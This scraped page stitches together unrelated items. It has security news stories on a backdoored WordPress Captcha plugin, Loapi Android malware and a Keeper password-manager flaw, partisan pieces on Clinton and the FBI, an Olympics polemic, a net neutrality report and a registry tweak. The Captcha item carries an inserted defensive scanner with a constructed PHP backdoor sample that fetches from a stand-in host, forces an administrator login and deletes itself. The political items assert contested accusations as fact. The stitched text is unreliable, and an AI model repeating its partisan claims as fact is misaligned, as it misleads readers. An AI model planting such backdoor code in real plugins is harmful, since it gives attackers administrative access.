Hacker News: Hidden Backdoor Found In WordPress Captcha Plugin Affects Over 300,000 Sites


Buying popular plugins with a large user base and using them for effortless malicious campaigns has become a new trend among bad actors.

One such incident happened recently when the renowned developer BestWebSoft sold a popular Captcha WordPress plugin to an undisclosed buyer, who then modified the plugin to download and install a hidden backdoor.

In a blog post published on Tuesday, the security firm WordFence revealed why WordPress recently kicked a popular Captcha plugin with more than 300,000 active installations out of its official plugin store.

While reviewing the source code of the Captcha plugin, WordFence researchers found a severe backdoor that could allow the plugin author or other attackers to remotely gain administrative access to WordPress websites without any authentication.

The plugin was configured to automatically pull an updated “backdoored” version from a remote URL — https[://]simplywordpress[dot]net/captcha/captcha_pro_update.php — after installation from the official WordPress repository, without the site admin’s consent.


This backdoor code was designed to create a login session with administrative privileges for the attacker, in this case the plugin author, allowing them to remotely access any of the 300,000 websites using the plugin without any authentication.

“This backdoor creates a session with user ID 1 (the default admin user that WordPress creates when you first install it), sets authentication cookies, and then deletes itself,” reads the WordFence blog post. “The backdoor installation code is unauthenticated, meaning anyone can trigger it.”

Also, the modified code pulled from the remote server is almost identical to the code in the legitimate plugin repository, therefore “triggering the same automatic update process removes all file system traces of the backdoor,” making it look as if it was never there and helping the attacker avoid detection.
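An added example, not code from the article or from WordFence, of how a site operator could scan plugin files for the three indicators described above (an update URL outside wordpress.org, a forced session for user ID 1, and self-deletion). The regular expressions are this example's own heuristics rather than WordFence's signatures, and the two PHP sources are constructed.

```python
"""Scan WordPress plugin PHP sources for indicators of the kind of backdoor
described above: an update pulled from a non-wordpress.org URL, a forced
login session for user ID 1, and code that deletes its own file.

Added example: the regular expressions are this example's own heuristics,
not WordFence's signatures, and the sample plugin sources are constructed."""
import re
from pathlib import Path

# Indicator patterns (heuristics assumed for this example). Each is a
# (name, compiled regex) pair; matches are reported with their line number.
INDICATORS = [
    # A hard-coded HTTP(S) URL whose host is not wordpress.org or a subdomain
    # of it: the Captcha backdoor fetched its payload from simplywordpress[.]net.
    ("remote_url_outside_wordpress_org",
     re.compile(r"https?://(?!(?:[\w-]+\.)*wordpress\.org/)[\w.-]+/\S*", re.I)),
    # Forcing a session for the first (admin) user without authentication.
    ("forced_session_for_user_1",
     re.compile(r"wp_set_(?:current_user|auth_cookie)\s*\(\s*1\b")),
    # The backdoor removed its own file after running.
    ("self_deletion",
     re.compile(r"\bunlink\s*\(\s*__FILE__\s*\)")),
]


def scan_source(name, source):
    """Return a list of (file, line_no, indicator, text) for one PHP source."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), 1):
        for indicator, pattern in INDICATORS:
            if pattern.search(line):
                findings.append((name, line_no, indicator, line.strip()))
    return findings


def scan_plugin_dir(plugin_dir):
    """Scan every .php file below plugin_dir (e.g. wp-content/plugins/captcha)."""
    findings = []
    for path in sorted(Path(plugin_dir).rglob("*.php")):
        findings.extend(scan_source(str(path), path.read_text(errors="replace")))
    return findings


# Constructed sample sources standing in for real plugin files.
CLEAN_PLUGIN = """<?php
/* Plugin Name: Example Captcha (constructed, benign) */
function example_captcha_check($answer) {
    return wp_verify_nonce($answer, 'example_captcha');
}
add_filter('login_form', 'example_captcha_check');
"""

SUSPICIOUS_UPDATER = """<?php
/* constructed sample mimicking the behaviour described in the article */
$update = wp_remote_get('https://example-badhost.invalid/captcha/update.php');
wp_set_current_user(1);
wp_set_auth_cookie(1);
@unlink(__FILE__);
"""

if __name__ == "__main__":
    hits = scan_source("clean.php", CLEAN_PLUGIN)
    hits += scan_source("updater.php", SUSPICIOUS_UPDATER)
    for hit in hits:
        print("%s:%d %s: %s" % hit)
```

Run `scan_plugin_dir("wp-content/plugins")` on a real install to triage every plugin; a hit is a reason to diff the plugin against the copy in the official repository, not proof of compromise on its own.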


The reason for adding the backdoor is unclear at the moment, but if someone pays a handsome sum to buy a popular plugin with a large user base, there must be a strong motive behind it.

In similar cases, we have seen organized cyber gangs acquire popular plugins and applications to stealthily infect their large user bases with malware, adware, and spyware.

While trying to establish the identity of the Captcha plugin buyer, WordFence researchers found that the simplywordpress[dot]net domain serving the backdoor file was registered to someone named “Stacy Wellington” using the email address “scwellington[at]hotmail.co.uk.”

Using a reverse WHOIS lookup, the researchers found a large number of other domains registered to the same user, including Convert me Popup, Death To Comments, Human Captcha, Smart Recaptcha, and Social Exchange.

What’s interesting is that all of the above-mentioned domains registered to this user contained the same backdoor code that the WordFence researchers found in Captcha.

WordFence has teamed up with WordPress to patch the affected version of the Captcha plugin and has blocked the author from publishing updates, so website administrators are strongly advised to replace their plugin with the latest official Captcha version, 4.4.5.

WordFence has promised to release in-depth technical details on how the backdoor installation and execution works, along with a proof-of-concept exploit after 30 days so that admins get enough time to patch their websites.

Swati - Hacking News
Technical Writer, Security Blogger and IT Analyst. She is a Technology Enthusiast with a keen eye on the Cyberspace and other tech related developments.

Former Asst. FBI Director: Clinton Crimes 20 Times Bigger than Watergate

Former Assistant FBI Director James Kallstrom unloaded on James Comey, Robert Mueller, Hillary Clinton, and Barack Obama Thursday, charging that major crimes “20 times bigger than Watergate” are being swept under the rug while Attorney General Jeff Sessions “is in a coma.”

Appearing on Fox News’ Varney & Co., Kallstrom told the host that it “was obvious to anybody that knows anything” that former President Barack Obama was not going to let James Comey indict Clinton.

“It turns out — unfortunately — he was a political hack,” Kallstrom said flatly. “I think he maybe started out in an honorable way. His opinion of himself is sky high —  just an unbelievable guy with just an arrogance about him…. It got him in trouble because I think he thought he was Superman and he found out that he wasn’t.”

Kallstrom blamed the Clintons for Comey’s descent into hackery.

“The dogs are always going to bite your heels when you’re dealing with the Clintons,” he explained. “Look how long the public, the American people have been dealing with the crime syndicate known as the Clinton Foundation… just look at what’s in the public domain. The Clintons have been taking advantage of their stations in life for so long.”

“Back in ’95, ’96 — somewhere around there — Bill Clinton let our guidance technology for our ICBM missiles go to China. Things like this that are very devastating,” he pointed out.

And then a few years down the road, “we sell 20 percent of our uranium,” Kallstrom added, referencing the corrupt Uranium One deal that routed millions of Russian dollars to the Clinton Foundation during the time Secretary of State Hillary Clinton served on the federal government’s Committee on Foreign Investment.

Kallstrom also questioned why Deputy Attorney General Rod Rosenstein was appointed to his position.

“What does he do as soon as he gets in there? He appoints a special counsel. Who is it? It’s Bob Mueller. Roll the tape backwards. Bob Mueller is the FBI director, Rosenstein is the U.S. attorney in Baltimore prosecuting people involved in this case.”

Kallstrom charged that Rosenstein was basically put in place at the DOJ by the Democrats, complaining that Sessions was forced to recuse himself while “this huge forest fire is burning up his real estate.”

“You don’t have to put your brother in there like Kennedy did,” he noted. “But put somebody in there that agrees with the policies you’re trying to put together. Then Rosenstein throws this hand grenade at you by naming this counsel — which is B.S. — and putting Mueller, who has a conflict of interest 20 miles wide, in on the job.”

He added, “I don’t know if it’s a conspiracy, but it sure smells like one.”

Kallstrom pointed out that just “the unmaskings of names alone is a major scandal.” Requests to identify Americans whose names surfaced in foreign intelligence reporting — known as unmasking — were made at a freakishly rapid rate in the final months of the Obama administration.

“We got all these major crime things bubbling – all of which were 20 times bigger than Watergate! And nothing seems to be happening… the attorney general is in a coma!” he said.

“Clinton cabal is GOING DOWN!” says Frm. FBI Asst. Director

Former FBI assistant director James Kallstrom has come forward and revealed that the Clinton Foundation’s crimes will soon be exposed by “patriots” fighting back against the FBI’s anti-Trump “cabal.”

Kallstrom, a 27-year veteran of the FBI, said that investigators are sick of the nonsense.

“99 percent of the people in the FBI are doing a fantastic job,” Kallstrom said during an interview with New York radio host John Catsimatidis last Sunday. “It’s a small cabal of people running the FBI, the James Comey sycophants” that are sabotaging the organization’s Clinton investigations.

But that’s going to end soon, Kallstrom revealed.

Talking to Fox Business Network’s Stuart Varney on Monday, Kallstrom claims there’s an organized movement of “patriots” within the FBI that are going to strike back — and their plan is already in motion.

Discussing the political bias at the top of the FBI, Varney summarized Kallstrom’s warnings about special counsel Robert Mueller’s investigation.

“I have said in my opinion there is a cabal active within the FBI and the Justice Department … which hates Trump, which protected Hillary Clinton and tried to bring down Donald Trump,” Varney said to Kallstrom. “That is an extraordinary story of interference in an American presidential election.”

“Without question that’s what it was. Just like the whole ‘so-called’ Clinton investigation, it was phony from the beginning,” Kallstrom said. “No grand jury, giving witnesses immunity, putting all the subjects in one room at the same time. I mean it’s crazy. It’s nuts what they did!”

Kallstrom said morale among the honest FBI agents is dangerously low, and that patriots within the organization are fed up.

“Well I think there’s a lot of patriots that have had it up to here with what’s going on, and they’re going to step forward and tell people what the shenanigans have been,” Kallstrom said, specifically mentioning how this FBI cabal “shut down the Clinton Foundation investigation” and turned the FBI investigations into politically-motivated witch hunts.

Would you support a change in FBI leadership… and Hillary Clinton’s immediate arrest?


The Horn News

Hacker News: This New Android Malware Can Physically Damage Your Phone


Due to the recent surge in cryptocurrency prices, not only hackers but also legitimate website administrators are increasingly using JavaScript-based cryptocurrency miners to monetize their sites by leveraging the CPU power of visitors’ PCs to mine Bitcoin or other cryptocurrencies.

Just last week, researchers from AdGuard discovered that some popular video streaming and ripper sites, including openload, Streamango, Rapidvideo, and OnlineVideoConverter, hijack CPU cycles from their hundreds of millions of visitors to mine the Monero cryptocurrency.

Now, researchers from Moscow-based cyber security firm Kaspersky Lab have uncovered a new strain of Android malware lurking in fake anti-virus and porn applications, which is capable of performing a plethora of nefarious activities—from mining cryptocurrencies to launching Distributed Denial of Service (DDoS) attacks.

Dubbed Loapi, the new Android Trojan performs so many malicious activities at once that it can overwork a handset to the point where, within just two days of infection, the phone’s battery bulges out of its cover.

Described as a “jack-of-all-trades” by the researchers, Loapi has a modular architecture that lets it conduct a variety of malicious activities, including mining the Monero cryptocurrency, launching DDoS attacks, bombarding infected users with constant ads, redirecting web traffic, sending text messages, and downloading and installing other apps.

Loapi Destroyed An Android Phone In Just 2 Days

When analyzing a Loapi sample, Kaspersky’s researchers discovered that the malware mines the Monero cryptocurrency so intensely that it destroyed an Android phone after two days of testing, causing the battery to bulge and deforming the phone cover.

According to the researchers, the cybercriminals behind Loapi are the same group responsible for the 2015 Android malware Podec. They are distributing the malware through third-party app stores and online advertisements that pose as apps for “popular antivirus solutions and even a famous porn site.”

A screenshot in the Kaspersky blog suggests that Loapi impersonates at least 20 variations of adult-content apps and legitimate antivirus software from AVG, Psafe DFNDR, Kaspersky Lab, Norton, Avira, Dr. Web and CM Security, among others.

Upon installation, Loapi forces the user to grant it ‘device administrator’ permissions by looping a pop-up until the victim taps yes, which gives the malicious app the same power over the smartphone that its owner has.

This highest level of privilege on a device would also make Loapi ideal for spying on users; although that capability is not yet present in the malware, the Kaspersky researchers think it could be added in the future.

Loapi Malware Aggressively Fights to Protect Itself

The researchers also said the malware “aggressively fights any attempts to revoke device manager permissions” by locking the screen and closing windows on the phone by itself.

Loapi communicates with module-specific command-and-control (C&C) servers, one for each of its advertisement, SMS, mining, web crawler, and proxy modules, to carry out the different functions on the infected device.

By connecting to one of the above-mentioned C&C servers, Loapi sends a list of legitimate antivirus apps that pose a danger to it, then claims the real app is malware and urges the user to delete it by showing a pop-up in a loop until the user finally removes the app.

“Loapi is an interesting representative from the world of malicious Android apps. Its creators have implemented almost the entire spectrum of techniques for attacking devices: the Trojan can subscribe users to paid services, send SMS messages to any number, generate traffic and make money from showing advertisements, use the computing power of a device to mine cryptocurrencies, as well as perform a variety of actions on the internet on behalf of the user/device,” the researchers concluded.

Fortunately, Loapi failed to make its way onto the Google Play Store, so users who stick to downloads from the official app store are not affected by the malware. But you are advised to remain vigilant even when downloading apps from the Play Store, as malware often finds its way there to infect Android users.

Mohit Kumar - Hacking News
Entrepreneur, Hacker, Speaker, Founder and CEO — The Hacker News and The Hackers Conference.

REPORT: Dirty Geopolitics of Olympics and Globalism – Will Russia Say NO and Start Alternative Games?

The spirit of Olympic Games is dead, without Russia participating, what’s the point? Empty hollow victories, worthless medals, meaningless competition marred by political sabotage. So-called winners will have an “*” forever next to their name, the mark of shame.
I for one will boycott these games, move along… there’s nothing to watch here. IOC and Wada – do your job, stay out of politics and uphold the true spirit of Olympics! SMH 😦

Futurist Trendcast

As we are approaching Christmas and New Year’s, this is the last major hard-hitting, heavy-duty geopolitical article of 2017, unless something extraordinary happens in the next two weeks! As a matter of fact, I hope this is the last report about geopolitics of sport and Olympics I’ll ever write. Let’s hope, although no guarantees as the pressure on Russia will continue and intensify before Russian elections. All pretexts to exert pressure and undermine elections will be used, and all weak links will be utilized, sport being one of the most prominent such weak links. However, when weak links are exposed to light, this also gives an opportunity to fix problems. Therefore, I hope Russians are paying attention, drawing conclusions and working on solutions. What solutions? Let’s talk about it below!

I’ve packed this piece with extra energy and embedded in it some extra interesting intel! Don’t miss!

THE VICIOUS PATTERN OF…


Hacker News: FCC Just Killed Net Neutrality—What Does This Mean? What Next?

Net neutrality is DEAD—3 out of 5 federal regulators voted Thursday to hand control of the future of the Internet to cable and telecommunication companies, giving them powers to speed up service for websites they favor or slow down others.

As proposed this summer, the US Federal Communications Commission (FCC) has rolled back the Net Neutrality rules that required Internet Service Providers (ISPs) to treat all services and websites on the Internet equally and prohibited them from blocking sites or charging for higher-quality service.

This action repeals the FCC’s 2015 Open Internet Order decision taken during the Obama administration.

What is Net Neutrality and Why Is It Important?

Net Neutrality is simply Internet Freedom—Free, Fast and Open Internet for all.

In other words, Net Neutrality is the principle that requires ISPs to give consumers access to any and all content on an equal basis, treating all Internet traffic equally.

Today, if there’s something that makes everyone across the world ‘Equal,’ it is the Internet.

Equality over the Internet means that all ISPs have to treat major websites like Facebook and Google the same way as someone’s local shop website, and that the wealthiest person in the world has the same right to access the Internet as the poorest.

This is what “Net Neutrality” aims at.

Here’s Why the FCC Repealed the Net Neutrality Rules


The FCC Chairman for the Trump administration, Ajit Pai, who has openly expressed his views against net neutrality, was previously quoted as saying that Net Neutrality was “a mistake.”

Pai has previously argued that the 2015 regulations had discouraged internet providers from investing in their networks, as well as slowed the expansion of internet access.

On Thursday, the FCC’s two Democrats voted against the decision to repeal Net Neutrality, while the three Republican members, Chairman Pai, Commissioner Brendan Carr, and Commissioner Mike O’Rielly, voted to overturn the protections put in place in 2015.

Here’s what all the three Republicans said in their remarks about their decision to repeal Net Neutrality:

“Prior to the FCC’s 2015 decision, consumers and innovators alike benefitted from a free and open internet. This is not because the government imposed utility-style regulation. It didn’t. This is not because the FCC had a rule regulating internet conduct. It had none. Instead through Republican and Democratic administrations alike, including the first six years of the Obama administration, the FCC abided by a 20-year bipartisan consensus that the government should not control or heavily regulate internet access,” said Commissioner Carr.

“I sincerely doubt that legitimate businesses are willing to subject themselves to a PR nightmare for attempting to engage in blocking, throttling, or improper discrimination. It is simply not worth the reputational cost and potential loss of business,” said Commissioner O’Rielly.

“How does a company decide to restrict someone’s accounts or block their tweets because it thinks their views are inflammatory or wrong? How does a company decide to demonetize videos from political advocates without any notice?…You don’t have any insight into any of these decisions, and neither do I, but these are very real actual threats to an open internet,” said Chairman Pai.

Here’s How the Internet & Tech Firms Reacted


The response from the tech industry was swift and loud and predictable. The industry isn’t happy with what is turning out to be the Trump administration’s biggest regulatory move yet.

“We are incredibly disappointed that the FCC voted this morning – along partisan lines – to remove protections for the open internet. This is the result of broken processes, broken politics, and broken policies. As we have said over and over, we’ll keep fighting for the open internet, and hope that politicians decide to protect their constituents rather than increase the power of ISPs,” Mozilla said in a statement.

“Today’s decision from the Federal Communications Commission to end net neutrality is disappointing and harmful. An open internet is critical for new ideas and economic opportunity – and internet providers shouldn’t be able to decide what people can see online or charge more for certain websites,” said Sheryl Sandberg, Chief Operating Officer of Facebook.

“We’re disappointed in the decision to gut #NetNeutrality protections that ushered in an unprecedented era of innovation, creativity & civic engagement. This is the beginning of a longer legal battle. Netflix stands w/ innovators, large & small, to oppose this misguided FCC order,” Netflix tweeted.

Obviously, Internet providers are more likely to strike valuable deals with large, established services and websites than relatively unknown companies or startups, which will be hit hardest by the repeal.

With no surprise, ISPs including Comcast, Verizon, and AT&T have welcomed the new rules, saying they will not block or throttle any legal content but may engage in paid prioritization.

Since the commission will take a few weeks to make final adjustments to the new rules, you will not see any potential change right away.

What Next? Can Net Neutrality Be Saved?


Obviously, the decision cannot be reversed overnight.

Reportedly, attorneys general from across the country and consumer advocacy groups are considering suing the FCC in an attempt to reverse Thursday’s repeal of the net neutrality rules.

To overturn the FCC’s order, critics and internet activists are also going to push for Congress to step in and pass a resolution of disapproval using the Congressional Review Act.

“This fight isn’t over. With our allies and our users, we will turn to Congress and the courts to fix the broken policies,” Mozilla said.

“We’re ready to work with members of Congress and others to help make the internet free and open for everyone,” Sheryl Sandberg said.

“We will continue our fight to defend the open Internet and reverse this misguided decision,” Twitter said.

The FCC’s repeal of net neutrality will take effect 60 days after publication in the Federal Register, which doesn’t happen immediately and could take six weeks or even more after the FCC vote.

Once it becomes law, the repeal will return everything to the state it was in before 2015.

Mohit Kumar - Hacking News

Hacker News: Pre-Installed Password Manager On Windows 10 Lets Hackers Steal All Your Passwords


If you are running Windows 10 on your PC, there is a chance that your computer contains a pre-installed third-party password manager app that lets attackers steal all your credentials remotely.

Starting from Windows 10 Anniversary Update (Version 1607), Microsoft added a new feature called Content Delivery Manager that silently installs new “suggested apps” without asking for users’ permission.

According to a blog post published Friday on the Chromium Blog, Google Project Zero researcher Tavis Ormandy said he found a well-known password manager, called “Keeper,” pre-installed on his freshly installed Windows 10 system, which he had downloaded directly from the Microsoft Developer Network.

Ormandy was not the only one who noticed the Keeper Password Manager. Some Reddit users complained about the hidden password manager about six months ago, one of whom reported Keeper being installed on a virtual machine created with Windows 10 Pro.

Critical Flaw In Keeper Password Manager

Knowing that a third-party password manager now comes installed by default on Windows 10, Ormandy started testing the software and took little time to discover a critical vulnerability that leads to “complete compromise of Keeper security, allowing any website to steal any password.”

“I don’t want to hear about how even a password manager with a trivial remote root that shares all your passwords with every website is better than nothing. People really tell me this,” Ormandy tweeted.

The security vulnerability in the Keeper Password Manager was almost identical to the one Ormandy discovered and reported in the non-bundled version of the same Keeper plugin in August 2016, which enabled malicious websites to steal passwords.

“I checked and they’re doing the same thing again with this version. I think I’m being generous considering this a new issue that qualifies for a ninety day disclosure, as I literally just changed the selectors and the same attack works,” Ormandy said.

To explain the severity of the bug, Ormandy also provided a working proof-of-concept (PoC) exploit that steals a user’s Twitter password if it is stored in the Keeper app.

Install Updated Keeper Password Manager

Ormandy reported the vulnerability to the Keeper developers, who acknowledged the issue and released a fix on Friday in version 11.4 by removing the vulnerable “add to existing” functionality.

Since the vulnerability only affects version 11 of the Keeper app, which was released on December 6 as a major browser extension update, it is a different issue from the one Ormandy reported six months ago. Keeper has also said that the company has not noticed any attack using this vulnerability in the wild.

As for Windows 10 users, Ormandy said they would not be vulnerable to the password theft unless they open the Keeper password manager and enable it to store their passwords.

However, Microsoft still needs to explain how the Keeper password manager gets installed on the users’ computers without their knowledge.

Meanwhile, users can use this registry tweak to disable Content Delivery Manager in order to prevent Microsoft from installing unwanted apps silently on their PCs.

Swati - Hacking News

e297a05 on Dec 14, 2015

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\DefaultUser\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager]
; 0 = silent installation of pre-installed "suggested apps" disabled
; 1 = enabled (default)
"PreInstalledAppsEnabled"=dword:00000000